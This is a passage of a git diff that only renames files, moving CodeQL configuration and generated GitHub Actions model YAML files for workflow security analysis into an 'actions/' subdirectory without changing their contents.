rename from ql/lib/ext/config/immutable_actions.yml
rename to actions/ql/lib/ext/config/immutable_actions.yml
diff --git a/ql/lib/ext/config/poisonable_steps.yml b/actions/ql/lib/ext/config/poisonable_steps.yml
similarity index 100%
rename from ql/lib/ext/config/poisonable_steps.yml
rename to actions/ql/lib/ext/config/poisonable_steps.yml
diff --git a/ql/lib/ext/config/untrusted_event_properties.yml b/actions/ql/lib/ext/config/untrusted_event_properties.yml
similarity index 100%
rename from ql/lib/ext/config/untrusted_event_properties.yml
rename to actions/ql/lib/ext/config/untrusted_event_properties.yml
diff --git a/ql/lib/ext/config/untrusted_gh_command.yml b/actions/ql/lib/ext/config/untrusted_gh_command.yml
similarity index 100%
rename from ql/lib/ext/config/untrusted_gh_command.yml
rename to actions/ql/lib/ext/config/untrusted_gh_command.yml
diff --git a/ql/lib/ext/config/untrusted_git_command.yml b/actions/ql/lib/ext/config/untrusted_git_command.yml
similarity index 100%
rename from ql/lib/ext/config/untrusted_git_command.yml
rename to actions/ql/lib/ext/config/untrusted_git_command.yml
diff --git a/ql/lib/ext/config/vulnerable_actions.yml b/actions/ql/lib/ext/config/vulnerable_actions.yml
similarity index 100%
rename from ql/lib/ext/config/vulnerable_actions.yml
rename to actions/ql/lib/ext/config/vulnerable_actions.yml
diff --git a/ql/lib/ext/config/workflow_runtime_data.yml b/actions/ql/lib/ext/config/workflow_runtime_data.yml
similarity index 100%
rename from ql/lib/ext/config/workflow_runtime_data.yml
rename to actions/ql/lib/ext/config/workflow_runtime_data.yml
diff --git a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml b/actions/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml b/actions/ql/lib/ext/generated/composite-actions/adap_flower.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/adap_flower.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/adap_flower.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml b/actions/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml b/actions/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml b/actions/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml b/actions/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml b/actions/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/anchore_grype.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml b/actions/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/anchore_syft.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml b/actions/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml b/actions/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml b/actions/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/ansible_awx.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/apache_arrow.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/apache_brpc.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_camel.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/apache_camel.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/apache_camel.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_flink.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/apache_flink.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/apache_flink.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/apache_opendal.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/apache_pekko.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_superset.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/apache_superset.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/apache_superset.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml b/actions/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml b/actions/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml b/actions/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml b/actions/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml b/actions/ql/lib/ext/generated/composite-actions/armbian_build.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/armbian_build.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/armbian_build.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml b/actions/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml b/actions/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml b/actions/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml b/actions/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml b/actions/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml b/actions/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml b/actions/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml b/actions/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml b/actions/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml b/actions/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml b/actions/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml b/actions/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml b/actions/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml b/actions/ql/lib/ext/generated/composite-actions/badges_shields.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/badges_shields.model.yml rename to actions/ql/lib/ext/generated/composite-actions/badges_shields.model.yml diff --git a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml b/actions/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml rename to actions/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml diff --git a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml b/actions/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml rename to actions/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml diff --git a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml b/actions/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml rename to actions/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml diff --git a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml b/actions/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml rename to actions/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml 
diff --git a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml b/actions/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml rename to actions/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml b/actions/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml rename to actions/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml b/actions/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml rename to actions/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml diff --git a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml b/actions/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml rename to actions/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml diff --git a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml b/actions/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml rename to actions/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml 
diff --git a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml b/actions/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml rename to actions/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml diff --git a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml b/actions/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml rename to actions/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml diff --git a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml b/actions/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml rename to actions/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml diff --git a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml b/actions/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml rename to actions/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml b/actions/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml rename to actions/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml 
diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml b/actions/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml rename to actions/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml diff --git a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml b/actions/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml rename to actions/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml diff --git a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml b/actions/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml rename to actions/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml diff --git a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml b/actions/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml rename to actions/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml diff --git a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml b/actions/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml rename to actions/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml 
diff --git a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml b/actions/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml rename to actions/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml diff --git a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml b/actions/ql/lib/ext/generated/composite-actions/coder_coder.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/coder_coder.model.yml rename to actions/ql/lib/ext/generated/composite-actions/coder_coder.model.yml diff --git a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml b/actions/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml rename to actions/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml diff --git a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml b/actions/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml rename to actions/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml diff --git a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml b/actions/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml rename to actions/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml 
diff --git a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml b/actions/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml rename to actions/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml diff --git a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml b/actions/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml rename to actions/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml diff --git a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml b/actions/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml rename to actions/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml diff --git a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml b/actions/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml rename to actions/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml diff --git a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml b/actions/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml rename to actions/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml 
diff --git a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml b/actions/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml rename to actions/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml diff --git a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml b/actions/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml rename to actions/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml b/actions/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml rename to actions/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml b/actions/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml rename to actions/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml b/actions/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml rename to actions/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml 
diff --git a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml b/actions/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml rename to actions/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml diff --git a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml b/actions/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml rename to actions/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml diff --git a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml b/actions/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml rename to actions/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml diff --git a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml b/actions/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml rename to actions/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml diff --git a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml b/actions/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml rename to actions/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml 
diff --git a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml b/actions/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml rename to actions/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml diff --git a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml b/actions/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml rename to actions/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml diff --git a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml b/actions/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml rename to actions/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml diff --git a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml b/actions/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml rename to actions/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml diff --git a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml b/actions/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/discourse_.github.model.yml rename to actions/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml 
